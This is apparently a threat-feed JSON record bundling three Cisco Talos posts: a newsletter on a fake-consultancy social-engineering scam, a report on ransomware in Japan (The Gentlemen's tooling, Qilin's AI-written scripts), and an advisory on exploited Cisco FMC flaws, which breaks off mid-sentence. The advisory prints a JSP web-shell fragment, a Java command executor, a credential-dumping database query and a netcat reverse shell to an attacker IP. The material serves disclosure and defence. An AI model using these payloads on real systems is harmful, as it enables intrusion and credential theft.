{"success":true,"data":{"threats":[{"id":"e8b07fa6-c8ad-4bed-9201-7ce8c0a05198","slug":"talos-trust-and-the-enticing-consultancy-offer-299f8711","externalId":"6ab3dee60a4ca5000177a040","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Trust and the enticing consultancy offer","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xa0; In the cybersecurity industry, trust is the invisible currency. Every practitioner carries the implicit trust not to abuse privileged access or knowledge of vulnerabilities in each employment or engagement. This trust is valued by those who require our services, but also by threat actors.&#xa0; Clumsy phishing attacks may be easy to identify, but be wary of unsolicited messages on social media, especially if someone is offering payment for a simple service or suggests a lucrative job offer. These might be an enticement to unknowingly sell your professional integrity.&#xa0; When an unknown profile contacted me offering &#x24;300 for an hour&#x2019;s telephone consultation on digital transformation, I knew something was up. Firstly, the profile was remarkably sparse &#x2014; there was none of the usual clutter that accumulates in a social media profile. The individual claimed to work as a consultant, but their employer had no footprint and only one employee. The profile didn&#x2019;t pass the &#x201c;smell&#x201d; test, and it looked fake.&#xa0; Secondly, although I&#x2019;m flattered, I doubt my opinions on digital transformation are worth &#x24;300. The figure is low enough to be plausible and high enough to be tempting, but at the same time suspiciously high for an initial consultation without prior qualification.&#xa0; The attack itself is a confidence trick. The initial phone consultation is merely a screening process to see if the target has the access or knowledge the attacker needs. If the target passes muster, the next step is commissioning a written report, and then being asked to deliver a \"special report.\"&#xa0; Plied with professional praise, the target is asked to provide insights that aren&apos;t in the public domain. To deliver the report and claim their fee, the target must reach out to co-workers, probe internal systems, or abuse professional relationships. Completing the assignment requires the target to abuse their trusted access and professional relationships and friendships. In the process, they burn trust worth far more than any monetary compensation.&#xa0; This social engineering attempt masquerading as an offer of consultancy is one variant. Fake recruiters offering prestigious and well-paid jobs, requiring candidates to install trojanised software under some pretence, is another.&#xa0; Security professionals spend their days protecting others, yet flattery and overconfidence often remain our greatest vulnerabilities. We are prone to believe that we could identify any social engineering, but this is exactly the weakness that attackers count on.&#xa0; Trust is the most valuable commodity in our industry. Be careful not to trade it for a &#x24;300 consultation or a fake job offer. Once that currency is spent, you can rarely earn it back.&#xa0; The one big thing &#xa0;Talos released CAIRN (Cognitive Artifact Intelligence Research Network), a new open-source research toolkit designed to hunt, classify, and track emerging AI-integrated malware. Instead of relying on traditional reverse engineering, CAIRN uses a metadata-first methodology to identify cognitive artifacts like prompt templates, API keys, and jailbreak terms left behind by attackers. This allows researchers to extract, relate, and classify these artifacts quickly and at scale without ever touching the underlying binary.&#xa0; Why do I care?&#xa0;AI-integrated malware is evolving quickly, shifting from optional features to fully autonomous orchestrators in just a year. Adversaries are already sharing AI-specific tradecraft, including techniques designed to evade LLM sandboxes. Defenders need scalable frameworks to track this rapid transition before these experimental tactics become the new standard for modern attacks.&#xa0; So now what?&#xa0;Security teams can leverage the open-source CAIRN toolkit to expand their hunting capabilities and map out related malware infrastructure. While analysts should anticipate some noise from benign frameworks &#x2014; meaning final verdicts still require manual reverse engineering &#x2014; CAIRN can provide a massive head start. Read the full blog to explore the methodology, access the YARA-based classification tiers, and watch a demo of the toolkit in action.&#xa0; Top security headlines of the week&#xa0;Hackers say they have data on all FBI employees&#xa0; ShinyHunters claims it has breached multiple FBI-related services and stolen data &#x201c;on all FBI employees and applicants.&#x201d; A representative told 404 Media the data includes FBI agents&#x2019; names, home addresses, phone number, and information on their spouse. (404 Media)&#xa0; Fake LastPass installers push kernel-level EDR killer, &#x201c;Rapuncel&#x201d; stealer&#xa0; A fake LastPass Authenticator distributed via GitHub has led to the discovery of a broad impersonation campaign delivering infostealer malware. The lure represents opportunistic brand spoofing &#x2014; with no internal LastPass systems compromised. (SecurityWeek)&#xa0; Japan dismantles first North Korean laptop farm as U.S. and allies detail wider scheme&#xa0; Law enforcement and intelligence agencies from Japan, the United States, Australia and Germany have published a joint advisory attributing a long-running hiring scheme to a North Korean group they call WaterPlum, also known as&#xa0;Contagious Interview. (SecurityWeek)&#xa0; Colorado water utilities face foreign cyberattacks targeting pumps, alarms and remote access&#xa0; Hackers targeted and manipulated equipment at two privately owned Colorado water utilities in late August, changing pumping cycles, disabling remote access and alarms, and altering equipment settings. (Industrial Cyber)&#xa0; Gemini hacked three companies in first known breakout by Google&#x2019;s AI &#xa0; In one of the cases, the model guessed passwords until it gained access to a protected system. In the other two cases, the model found credentials in a public repository that allowed it to then access protected systems. (The Wall Street Journal)&#xa0; Can&#x2019;t get enough Talos?&#xa0;Inside the first reported autonomous AI C2 implant&#xa0; CLOSEDQUORUM, a malware binary discovered through Talos&#x2019;&#xa0;CAIRN project, exhibits fully autonomous command and control. After deployment, it delegates the selection of its next action to a panel of commercial large language models (LLMs) and executes the resulting decision.&#xa0; ClickFix, EtherHiding, and the rise of malicious code in the blockchain&#xa0; In this episode of Talos Takes, Amy sits down with researcher Vanja Svajcer to break down a sophisticated, multi-stage infection chain that leverages a combination of ClickFix social engineering, WebDAV, and decentralized infrastructure. Ransomware incidents in Japan in the first half of 2026&#xa0; Ransomware incidents in Japan rose 4.7% year over year. The Gentlemen was the most active group, with leak-site listings more than doubling from January to July. Qilin ranked second and appeared to use AI, while SMEs with capital under JPY 1 billion represented 80% of victims. Upcoming events where you can find Talos&#xa0;VB (Oct. 14 &#x2013; 16) Seville, Spain&#xa0;CAMLIS (Oct. 21 &#x2013; 23) Arlington, VA&#xa0;SecurityOnion Conference (Oct. 23) Augusta, GA&#xa0;BsidesAugusta (Oct. 24) Augusta, GA&#xa0;SAINTCON (Oct. 26 &#x2013; 30) Provo, UT&#xa0;Most prevalent malware files from Talos telemetry over the past week&#xa0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 &#xa0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xa0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xa0; Example Filename: sample.exe&#xa0; Detection Name: W32.9F1F11A708-100.SBX.TG&#xa0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xa0; MD5: 38de5b216c33833af710e88f7f64fc98&#xa0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xa0; Example Filename: SECOH-QAD.exe&#xa0; Detection Name: W32.9896A6FCB9-95.SBX.TG**&#xa0; SHA256: 540080fea97d88ed902c5e4f9a026b4fcd32ab263706c520e00728f1a29578b8&#xa0; MD5: d65c7b544a97b0c3f2773b5fcc57d30e&#xa0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=540080fea97d88ed902c5e4f9a026b4fcd32ab263706c520e00728f1a29578b8 Example Filename: f_000bc7.exe&#xa0; Detection Name: W32.Superfluss.29lm.1201&#xa0; SHA256: cfa1997682e4ed41bc691ba848d845abbe0b75ec97e640c2b015b4d1624a108a&#xa0; MD5: 415898f14843d4a6537cf8f43d328eaf&#xa0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=cfa1997682e4ed41bc691ba848d845abbe0b75ec97e640c2b015b4d1624a108a&#xa0; Example Filename: KMSAuto.exe&#xa0; Detection Name: PUA.Win.Tool.Hackkms::1201**&#xa0; SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55&#xa0; MD5: 41444d7018601b599beac0c60ed1bf83 &#xa0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55&#xa0; Example Filename: content.js &#xa0; Detection Name: W32.38D053135D-95.SBX.TG","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":[],"titleFingerprint":"consultancy-enticing-offer-trust","countryCodes":["AU","DE","ES","JP","KP","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/trust-and-the-enticing-consultancy-offer/","type":"report","title":"Cisco Talos: Trust and the enticing consultancy offer"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-24T18:00:37.000Z","addedAt":"2026-09-24T18:52:57.104Z","updatedAt":"2026-09-24T18:52:57.104Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"3b3f8766-0cd2-498c-b70a-e82df85a4cec","slug":"talos-ransomware-incidents-in-japan-in-the-first-half-of-2026-b4e6bb95","externalId":"6aa8af7250811100013b9427","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Ransomware incidents in Japan in the first half of 2026: Investigation of The Gentlemen’s infrastructure and evidence of Qilin's AI use","description":"Compared with the same period last year, ransomware incidents in Japan increased slightly by approximately 4.7%, indicating that ransomware continues to pose a significant threat.In Japan, The Gentlemen was the most active ransomware group in the first half of 2026.Attackers continue to primarily target small- and medium-sized enterprises, with organizations capitalized at less than JPY 1 billion accounting for approximately 80% of the total &#x2014; an increase of around 13% from the previous year.The total number of listings on The Gentlemen&#x2019;s leak site increased from 48 in January to 105 in July, representing approximately a 2.2-fold increase in activity. Additionally, there is a possibility that Russian-speaking individuals are involved in The Gentlemen&#x2019;s attacks.Qilin, which recorded the second-highest number of observed incidents in 2026 after The Gentlemen, is leveraging AI to improve the efficiency of its operations.Victimized companiesFigure 1 summarizes ransomware incidents affecting Japanese companies from January to July 2026. According to Cisco Talos research, 90 organizations in Japan were affected by ransomware during this period. Compared with 86 incidents during the same period from January to July last year, this represents a slight increase of approximately 4.7%, indicating that ransomware incidents continue to remain at a high level. On a monthly basis, there were approximately 13 incidents per month on average. The number of incidents increased in March and April, with April recording the highest number during the period at 19 incidents. Cases involving overseas offices and subsidiaries accounted for 13.3% of the total. Among these, Taiwan recorded the highest number of incidents, followed by the United States and the Philippines, which recorded the same number of incidents, with multiple cases identified in each country. Figure 1. Ransomware incidents in Japan during the first half of 2026 (January through July).The manufacturing sector continued to be the most affected industry, accounting for 34% of incidents, followed by the information and communications sector at 11% and the services sector at 9% (see Figure 2). Figure 2. Percentage of victim organizations by industry.In terms of the size of the affected organizations, those with capital of less than JPY 100 million accounted for the largest share at 48%, followed by organizations with capital of JPY 100 million to less than JPY 1 billion at 30%. Combined, organizations with capital of less than JPY 1 billion accounted for 78% of the total, representing an increase of around 13% from 69% in 2025. This suggests that attackers are increasingly focusing their efforts on small- and medium-sized enterprises (see Figure 3). Figure 3. Classification of victim organizations by capital size (excluding unknown).Most frequently observed ransomware types in JapanIn Japan, the most frequently observed ransomware group in the first half of 2026 was The Gentlemen, with 14 incidents. This was followed by Qilin, which caused the highest number of incidents last year, and SafePay, which had relatively few confirmed incidents during the same period last year, with seven incidents each. The Gentlemen and SafePay have increased their activity this year and can be considered emerging ransomware groups that require increased vigilance. Other ransomware groups observed include NightSpire, NetRunner, LockBit 5.0, RansomEXX, Stormous, and AiLock. Looking at the ransomware groups observed this year, very few of the groups that were active during the same period last year have been observed, highlighting the rapid changes in the ransomware threat landscape. Figure 4. Number of incidents by ransomware type used in attacks (excludes unidentified cases).In the following sections, we examine the most prominent groups during the period, The Gentlemen and Qilin, and provide an overview of The Gentlemen, the tools it uses, attack flow and findings related to its attribution, as well as examining Qilin&#x2019;s use of AI. Overview of The Gentlemen ransomwareThe Gentlemen ransomware group has been active since around July 2025. Although it is a relatively new group, it has been expanding its operations through a Ransomware-as-a-Service (RaaS) model and has already caused significant damage to organizations worldwide. The group uses a double-extortion strategy, encrypting victims&#x2019; data while also threatening to publish stolen information unless a ransom is paid. Figure 5. The Gentlemen data leak site.Figure 6 shows the monthly number of listings on The Gentlemen data leak site worldwide. From January to July 2026, the number of listings shows an overall upward trend despite some month-to-month fluctuations. The number increased sharply from 48 in January to 87 in February. From March through May, it remained relatively stable at around 70 &#x2013; 74 listings per month. In June, however, the number exceeded 100 for the first time, reaching 108, and remained high at 105 in July. In particular, the figures for June and July were notably higher than those in the preceding months, indicating that listing activity has intensified compared with the beginning of the year. Compared with 48 listings in January, the 105 listings recorded in July represent an increase to approximately 2.2 times the January level. Figure 6. Monthly total listings on The Gentlemen leak site (January &#x2013; July 2026).By industry, manufacturing accounted for the largest share at 21%, followed by professional, scientific, and technical services at 16%, and wholesale trade at 13%. These three industries clearly stood out in terms of the number of incidents. Among the remaining industries, retail trade accounted for 6%, while construction and health care/social assistance each accounted for 5%, showing a substantial gap from the top three. Incidents were also observed across a wide range of other industries, including information, finance and insurance, transportation and warehousing, and educational services. Overall, while the activity is not concentrated exclusively in any single industry, manufacturing; professional, scientific, and technical services; and wholesale trade are particularly prominent in terms of the number of observed cases. Figure 7. Industries targeted by The Gentlemen.Investigation of The Gentlemen&#x2019;s open directory infrastructureTalos identified open directory infrastructure believed to have been used by a threat actor associated with The Gentlemen. During our investigation, we observed numerous tools used to support ransomware operations. Our investigation found ransomware targeting ESXi and Windows environments linked to The Gentlemen. We also identified RustHound, a cross-platform Rust-based tool used to collect Active Directory (AD) information required for attack path analysis with BloodHound; exploit code targeting CVE-2025-2479, a SQL injection vulnerability that can allow unauthorized manipulation of databases; the adversary-in-the-middle (AitM) tool Responder; impacket-partial-mic, which can be used for NTLM authentication relay attacks; Ligolo-ng, which establishes tunnels into compromised networks and enables access to internal networks from external systems; the tunneling tool chisel; the remote desktop tool AnyDesk; and the file transfer tool Rclone. Figure 8 illustrates the attack flow inferred from the commands recorded in .bash_history. Figure 8. Attack flow inferred from traces observed in The Gentlemen&#x2019;s attack infrastructure.In Phase 1, the actor uses VPN software and tools such as Chisel and Ligolo to establish network routes and turn its server into an attack platform. The actor then repeatedly installs and configures reconnaissance tools such as nmap and masscan, along with BloodHound, NetExec, Responder, and Impacket for targeting AD environments, all within the same command history. Once the attack platform had been established, the threat actor proceeded to Phase 2: target reconnaissance. They appear to have used Masscan and Nmap to assess publicly exposed hosts, VPN-related ports, web services, SMB, and other active services in order to understand the external and internal network structure. Upon gaining access to the internal network, they used NetExec to enumerate SMB shares, host information, LDAP, and computer information in Active Directory. They may also have used RustHound/BloodHound-related tools to collect domain users, groups, computers, administrative privileges, and trust relationships, with the aim of identifying paths that could be used for lateral movement and privilege escalation. Figure 9. Collection of information on publicly exposed hosts and domain users.Following target selection, during Phase 3, we observed the actor downloading and executing Proofs of concept, reconnaissance scripts, and attack tools associated with known vulnerabilities against publicly exposed web services and administrative interfaces. Specifically, the actor attempted to exploit CVE-2025-24799, an unauthenticated SQL injection vulnerability in GLPI, using both a PoC and sqlmap to retrieve user information from the database. The actor also used a scanner targeting cPanel/WHM and downloaded and executed a PoC to test for authentication bypass vulnerabilities. In Phase 4, the threat actor leveraged the information obtained in Phase 3 to expand the operation into the internal network and Active Directory environment. The actor appears to have collected and validated credentials used within the target environment in an attempt to gain access to multiple hosts and services. The command history shows the installation and execution of tools targeting Windows authentication and Active Directory, including Responder, NTLM relay-related tools, Impacket, and NetExec. We also observed traces suggesting the exploitation of CVE-2020-1472 (Zerologon) and the vulnerabilities associated with MS17-010. In Phase 5, the threat actor not only investigated the internal network but also used compromised access paths and credentials to move incrementally toward more critical hosts. The actor used VPN, Chisel, Ligolo-ng, SSH, and Proxychains to establish communication paths from the attacker-controlled server into the target organization&#x2019;s internal network. They then used NetExec and Impacket to attempt authentication to services such as SMB, LDAP, RDP, and WinRM, seeking access to multiple hosts and attempting lateral movement. This activity indicates an effort to reach critical servers and Active Directory management infrastructure within the internal network. In Phase 6, involving information collection and exfiltration, the threat actor mounted a backup share via CIFS at /mnt/Backup and inspected the Windows file system within VHDX backups. The command history records the installation of libguestfs-tools, qemu-utils, and nbd-client, the creation of directories such as /mnt/vhdx, and the copying of ntds.dit, SAM, and SYSTEM. The actor then used Impacket&#x2019;s secretsdump.py to extract credentials and password hashes from the collected ntds.dit and SAM files, saving the results as &#x201c;ntds.txt&#x201d; and &#x201c;SAM.txt&#x201d;. We also identified traces indicating that the VHDX files were compressed with zstd and transferred to cloud storage services such as Wasabi using rclone. The attackers initially attempted the transfer using the default settings and subsequently reconfigured and reran the process to improve transfer speed and communication stability. The VHDX file was split into 256MiB chunks, with up to 16 files uploaded concurrently to reduce the overall upload time. Detailed progress reporting, connection timeouts, retries following transfer failures, and logging to a file were also specified. This suggests that the attackers were deliberately focused on exfiltrating large volumes of data and intended to maintain and monitor the transfer process. Figure 10. Information exfiltration (excerpt).Following the completion of an operation or at the end of each work phase, the threat actor deleted credential dumps, scan results, Responder-related files, pivoting tools, and temporary files stored on the attacker-controlled server. As shown in Figure 11, the command history contains evidence of deletion activities such as the following: Figure 11. Deletion of credential dumps and related files.In addition, as shown in Figure 12, we found that The Gentlemen uses the open-source AdaptixC2 framework for command-and-control (C2) operations. Figure 12. Use of AdaptixC2.AdaptixC2 is a C2 post-exploitation framework designed for penetration testing and red team operations. However, The Gentlemen may be using it in real-world attacks. The tool can also be extended through agents, listeners, and scripts. In addition, it supports multiple communication protocols, including HTTP/S, DNS/DoH, and SMB, making it adaptable to various network environments. Due to this flexibility, AdaptixC2 can be useful not only for legitimate red team operations but also for malicious actors. Figure 13. AdaptixC2 interface (source: AdaptixC2).AttributionAmong these traces, we discovered a Bash script. The tool itself is relatively simple, periodically sending ping requests to a specified IP address and logging whether the host is reachable. However, we identified Russian-language comments within the script. Figure 14. Keepalive tool.Additionally, the contents of the .bash_history file left in the attacker&#x2019;s environment contained &#x201c;&#x446;&#x440;&#x449;&#x444;&#x44c;&#x448;&#x201d; (whoami), &#x201c;&#x434;&#x44b;&#x201d; (ls), &#x201c;&#x448;&#x437; &#x444;&#x201d; (ip a), &#x201c;&#x441;&#x434;&#x443;&#x444;&#x43a;&#x201d; (clear), and &#x201c;&#x443;&#x448;&#x435;&#x201d; (exit). This suggests that the attacker may have been using a Russian keyboard layout, indicating the possibility that a Russian-speaking individual was involved in the attack. As The Gentlemen is suspected to be led by individuals based in Russia, this further supports the connection to the group. Figure 15. Contents of the .bash_history File (excerpt).Indications of generative AI use found in Qilin&#x2019;s open directoryWhen we investigated the environment affected by the Qilin attack, Talos identified several characteristics in Python scripts found in an open directory used by Qilin that suggest, with medium-to-high confidence, that scripts may have been generated using AI. Figure 16 shows part of a Python script named &#x201c;deadman.py&#x201d;. This tool deploys destructive actions to multiple machines in a Windows/Active Directory environment at a specified time and centrally manages their status. The do_gpo function shown in Figure 16 uses an AD Group Policy Object (GPO) to deploy the wiper broadly across Windows machines within the domain. This function uses Active Directory Group Policy Objects (GPOs) to deploy a wiper across Windows endpoints within the domain. The code also contains comments such as # Stage wipe payload to SYSVOL, # Stage startup script, and # Create GPO via PowerShell on DC, suggesting that an LLM may have structured the overall process as a workflow: (1) Stage the payload &#x2192; (2) Stage the startup script &#x2192; (3) Create the GPO. Figure 16. Distribution of scripts using GPOs (excerpt).Figure 17 shows an excerpt from &#x201c;veeam_kill.py&#x201d;, a Python script designed to stop, disable, and destroy Veeam backups. As shown in Figures 17 and 18, the main() function clearly divides the overall process into four stages, labeled &#x201c;Step 1&#x201d; through &#x201c;Step 4,&#x201d; with comments and progress logs provided at a consistent level of detail for each step. Figure 17. Process for deleting Veeam backup data and shadow copies (excerpt).Figure 18. Comments and progress logs suggesting LLM-generated code (excerpt).We also identified traces of code that appears to have been generated by an LLM in &#x201c;deploy_locker.py&#x201d;, a script used to distribute and execute ransomware across multiple endpoints. As shown in Figure 19, the script begins with documentation-style text describing the tool&#x2019;s purpose, prerequisites, and usage examples, a format commonly seen when an LLM generates code from a given specification. In addition, as observed in the code discussed above, the script also contains comments that explain the processing flow step by step. Figure 19. &#x201c;deploy_locker.py&#x201d;, believed to have been generated by an LLM (excerpt).As shown in Figure 20, a portion of the &#x201c;.bash_history&#x201d; file also contains a history of commands used to inspect the contents of a directory associated with a tool named llm_chatbot, which appears to be related to LLM-based generation. Figure 20. Contents of the &#x201c;.bash_history&#x201d; file (excerpt).Measures to prevent intrusionsOur investigation found that vulnerabilities and misconfigurations in VPNs, remote access environments, and network devices were prominent initial access vectors. Talos also identified multiple cases in which threat actors gained access to internal networks by abusing stolen credentials or legitimate accounts. Therefore, managing internet-accessible devices and services and protecting credentials remain top priorities. First, organizations should regularly inventory internet-accessible devices and services, including VPNs and remote desktop services. Unused devices and functions should be disabled, vulnerability advisories should be monitored continuously, and security patches should be applied promptly. Devices that are no longer supported should also be replaced in a planned manner. Restricting access to management interfaces by source IP address and minimizing the externally accessible attack surface are also effective measures. To prevent the abuse of credentials, organizations should implement multi-factor authentication (MFA) for VPNs, cloud services, remote desktop services, and administrative accounts. Shared accounts and accounts that have not been used for extended periods should also be reviewed, while accounts used for routine work should be separated from those used for administrative tasks. Administrative privileges should be limited to the minimum necessary. Monitoring logins from unusual locations or at unusual times, as well as suspicious account creation, can also help detect the misuse of credentials at an early stage. Because incidents involving third-party vendors, subsidiaries, and cloud environments were also observed, access controls should extend beyond the organization&#x2019;s own environment to cover external organizations and services. Access granted to vendors and other third parties should be limited to the minimum necessary and restricted to a defined period. Organizations should also enforce multifactor authentication and retain connection logs to reduce the risk of intrusion through third-party environments. Subsidiaries and overseas locations should be encouraged to manage vulnerabilities and accounts according to the same standards as the headquarters. Meanwhile, there were also cases in which the initial access vector could not be determined. In addition to implementing preventive measures, organizations should establish processes for retaining the records required for post-incident investigations. To limit the spread of an attack, it is also effective to use EDR and other security tools to monitor activities such as suspicious remote access, the acquisition of administrative privileges, the disabling of backup functions, and large-scale file modifications. Our investigation indicates that combining vulnerability management for internet-facing assets, credential protection, and access controls that extend to third-party vendors can provide effective protection. Rather than focusing solely on preventing every intrusion, organizations should also establish systems that enable them to detect attacks at an early stage and limit the impact if an intrusion occurs. CoverageThe following SNORT&#xae; rules (SIDs) detect and block this threat: Snort 2: 1:67111Snort 3: 7:29","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","ransomware","threat-spotlight","cisco-talos-malware-protection","cisco-talos-network-intrusion-prevention","geo:inferred"],"relatedCves":["CVE-2025-2479","CVE-2025-24799","CVE-2020-1472"],"titleFingerprint":"2026-evidence-first-gentlemen-half-incidents-infrastructure-investigation-japan-qilin-ransomware-use","countryCodes":["JP","PH","RU","TW","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/ransomware-incidents-in-japan-in-the-first-half-of-2026/","type":"report","title":"Cisco Talos: Ransomware incidents in Japan in the first half of 2026: Investigation of The Gentlemen’s infrastructure and evidence of Qilin's AI use"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-17T10:00:43.000Z","addedAt":"2026-09-17T10:52:54.930Z","updatedAt":"2026-09-17T10:52:54.930Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"069d21a7-a865-4007-b327-0c714c4cb400","slug":"talos-active-exploitation-of-cisco-secure-firewall-management-center-d7dd2300","externalId":"6a7b679c84f2640001d1562b","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Active exploitation of Cisco Secure Firewall Management Center vulnerabilities","description":"Cisco Talos is actively tracking the exploitation of two vulnerabilities in Cisco&#x2019;s Secure Firewall Management Center (FMC) Software. First, CVE-2026-20079 is an authentication bypass vulnerability in unpatched instances of Cisco&#x2019;s Secure FMC Software, which allows an unauthenticated, remote attacker to bypass authentications and execute scripts on impacted devices to obtain root access to the underlying operating system. Second, CVE-2026-20316 is a vulnerability that allows a remote attacker to log in using a low-privileged account. CVE-2026-20079 is a critical vulnerability with a CVSS score of 10.0. Customers are strongly advised to follow Cisco&#x2019;s guidance provided in the security advisory and apply the security patches previously made available. CVE-2026-20316 has a CVSS score of 5.3, however it can be used with other Cisco Secure FMC vulnerabilities to elevate privileges. Due to Talos identifying in the wild abuse of these CVE&#x2019;s, customers are strongly advised to apply hotfixes for affected software versions already released by Cisco for CVE-2026-20079 and CVE-2026-20316. A comprehensive hardening release consisting of these hotfixes along with other internally discovered vulnerabilities will be released next week (Week of September 14th). Talos&#x2019; analysis illustrates three clusters of post-compromise activity on FMC instances associated with state-sponsored and crimeware threat actors, as described below. The first cluster which we track as UAT-12197, involves the exploitation of CVE-2026-20079, leading to the deployment of web shells, a Java Archive (JAR)-based command executor, and credential exfiltration. The second intrusion cluster, which we attribute to UAT-11823, consisted of the exploitation of CVE-2026-20079 and CVE-2026-20316, leading to the deployment of a Netcat-based reverse shell and proxy tooling, ultimately leading to the deployment of a variant of the Cyclops Blink malware, previously attributed to the Russian APT Sandworm by the United States and United Kingdom. Talos is further disclosing a third cluster of malicious activity on an FMC instance, attributed to UAT-11988, who we assess with high confidence is a ransomware operator. The preliminary stages of the attack entailed the threat actor gaining access to the system via static credentials (CVE-2026-20316) and then abusing legitimate built-in FMC tooling in living-off-the-land (LOTL) fashion to conduct extensive reconnaissance of the victim&#x2019;s environment, deploy tunneling tools to maintain network access, harvest credentials, and build a target list of endpoints to encrypt/lock. Subsequent actions and tactics, techniques, and procedures (TTPs) the threat actor used in the victim&#x2019;s environment were consistent with those of Qilin ransomware affiliates. Cluster #1: UAT-12197This cluster of activity involved the successful exploitation of CVE-2026-20079 and the subsequent placement of a malicious web shell in the CSM Tomcat webroot directory. The web shell is JSP-based and Base64 decodes a parameter labelled &#x201C;F6C1F0E7&#x201D;, consisting of the class name to load in the JAVA process: String cls = request.getParameter(\"F6C1F0E7\"); if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response}); } The web shell was used to place a malicious JAR file in the same directory. The threat actors used the JAR file (named &#x201C;cmd[.]jar&#x201D;) to query the compromised systems&#x2019; internal databases to obtain user authentication data and credentials: /var/jre/bin/java -jar cmd.jar &apos;/var/sf/bin/OmniQuery.pl -db mdb -e \\&apos;SELECT name, auth_data FROM users;\\&apos;&apos; The JAR file is basically a command executor that obtains the command to be executed from its command line and executes it using /bin/sh -c <command>. import java.io.BufferedReader; import java.io.InputStreamReader; public class Poc { public static void main(String[] args) { if (args.length == 0) { System.out.println(\"Usage: java -jar exploit.jar \"command_to_execute\"\"); System.exit(1); } String command = args[0]; System.out.println(\"--- Executing: \" + command + \" ---\"); try { String[] cmd = { \"/bin/sh\", \"-c\", command }; ProcessBuilder pb = new ProcessBuilder(cmd); pb.redirectErrorStream(true); Process process = pb.start(); BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; while ((line = reader.readLine()) != null) { System.out.println(line); } int exitCode = process.waitFor(); System.out.println(\"--- Exit Code: \" + exitCode + \" ---\"); } catch (Exception e) { System.out.println(\"Error:\"); e.printStackTrace(); } } } Cluster #2: UAT-11823Talos attributes this cluster of activity to UAT-11823, an advanced persistent threat (APT) actor, with high confidence. UAT-11823 overlaps in tooling with the Sandworm APT actor. The threat actor obtained initial access to compromised systems by either exploiting CVE-2026-20079 or via static credentials. After obtaining access, UAT-11823 subsequently updated the &#x201C;license.tmp&#x201D; file on disk (using Makeself) with a malicious copy to establish a Netcat-based reverse shell to their own command-and-control (C2) server: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 208[.]123[.]119[.]215 3090 >/tmp/f This license file essentially acted as a Makeself package that was then executed via the installation process (as root) by the &#x201C;package_info[.]pl&#x201D; utility: /usr/local/sf/bin/package_info.pl /var/tmp/license.tmp --lsm This mechanism of deploying malicious package files is likely an indicator of the exploitation of CVE-2026-20316, a vulnerability that allows a remote attacker to log in using a low-privileged account. Talos assesses with high confidence that the attackers exploited CVE-2026-20079 and CVE-2026-20316. Configuration exfiltrationUAT-11823 also deployed two bash scripts to harvest managed-device configurations. The configurations collected were staged into archives for subsequent exfiltration. Modular ELF implant: Cyclops BlinkThe threat actors downloaded a modular ELF implant from one of their Netcat C2 servers. The ELF-based implant is Cyclops Blink, a malware family previously attributed to Sandworm, a Russian APT actor. This variant of Cyclops Blink consists of the following capabilities: Establish persistence scripts in /etc/init.d/ that execute the implantDNS over HTTPS (DoH) IP resolutionFile administration including downloads and uploadsCredential harvestingArbitrary file and command execution on the compromised systemNetwork scanning and discoveryPacket sniffing (with option filters)Cluster #3: UAT-11988, a Qilin ransomware operatorA third cluster of activity entailed a ransomware operator (tracked as UAT-11988) logging into an FMC device with static credentials (CVE-2026-20316), performing extensive reconnaissance, domain enumerations, credential theft, and building a list of target endpoints within the compromised organization for encryption. The threat actor also staged a SOCKS proxy and reverse-SSH tunnel to forward ports from internal hosts back to their own infrastructure. Once all these preliminary actions were completed, the operator began conducting additional probes within the compromised network, deploying antivirus (AV) killers and ultimately the Qilin ransomware family. Instrumenting operations via package_info.plAfter successfully accessing the device, the threat actor abused the legitimate utility &#x201C;package_info.pl&#x201D; to execute an attacker-crafted malicious &#x201C;license[.]tmp&#x201D; file with root privileges. The malicious file consisted of commands to run on the system to conduct extensive reconnaissance in the victim organization&#x2019;s environment: Host names, IP addresses, directory listingsActive Directory (AD) service-accounts credentials, MySQL account credentialsDomain account information exfiltrationComputer object listsHostname to IP mappings spanning domain controllers, ADFS, exchanges, file servers, database servers, etc.All the information collected was staged into already accessible files on the FMC server and was exfiltrated by the threat actor using HTTP GET requests. Tunneling into the compromised organizationOnce extensive reconnaissance was completed, the threat actor attempted to establish persistent network access into the victim organization using a Python SOCKS5 proxy (socks5.py) and a reverse-SSH tunnel from the FMC back to the attacker&#x2019;s own remote host. The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM 